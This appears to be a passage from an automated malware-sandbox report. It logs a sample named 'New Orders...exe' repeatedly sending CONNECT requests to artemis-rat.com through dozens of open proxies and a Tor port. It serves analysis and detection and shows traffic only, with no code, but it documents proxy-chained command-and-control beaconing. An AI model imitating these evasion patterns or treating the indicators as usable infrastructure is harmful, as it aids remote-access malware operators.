                                                                                        1879192.168.2.95295761.178.152.3173027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.875857115 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:52.256999016 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1880192.168.2.95293687.237.239.5731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.876101017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945246935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.037821054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.132638931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.132476091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.241983891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.257499933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.320223093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.886761904 CET84INHTTP/1.0 200 Connection established
                                                                                        Proxy-agent: Kerio Control/9.1.0 build 1087


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1881192.168.2.95495074.118.80.24431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.876101017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1882192.168.2.95426172.49.49.11310347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.897984982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1883192.168.2.952997162.214.121.173448267672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.907352924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945226908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.037785053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.132659912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.135427952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1884192.168.2.955055199.187.210.5441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.911449909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1885192.168.2.955032186.96.50.209997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.913217068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.976479053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.976865053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.070210934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.163739920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.163887024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.273148060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.273272038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:52.273154020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1886192.168.2.952874103.215.139.3264377672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.913961887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945246935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.037821054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.132664919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.135576010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1887192.168.2.953107203.96.177.211159017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.918135881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.945276976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.037834883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.132673025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.135555983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.242265940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.257522106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.320209026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1888192.168.2.95295485.30.215.48329467672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.932928085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.593754053 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1889192.168.2.954922193.200.151.15881927672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.947348118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1890192.168.2.953189134.122.22.23331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.968162060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.976483107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.976716995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.070247889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.163780928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.167596102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:40.273184061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:04.273291111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1891192.168.2.954043199.58.184.9741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.968163967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1892192.168.2.95304345.173.12.14119947672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.968255997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.444912910 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1893192.168.2.954049107.152.98.541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.968291998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1894192.168.2.953142163.172.129.251163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.975233078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.976512909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.269840002 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1895192.168.2.9530153.73.120.10431287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.021254063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.163882971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.164036036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.996316910 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1896192.168.2.955080200.115.188.5280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:52.027497053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
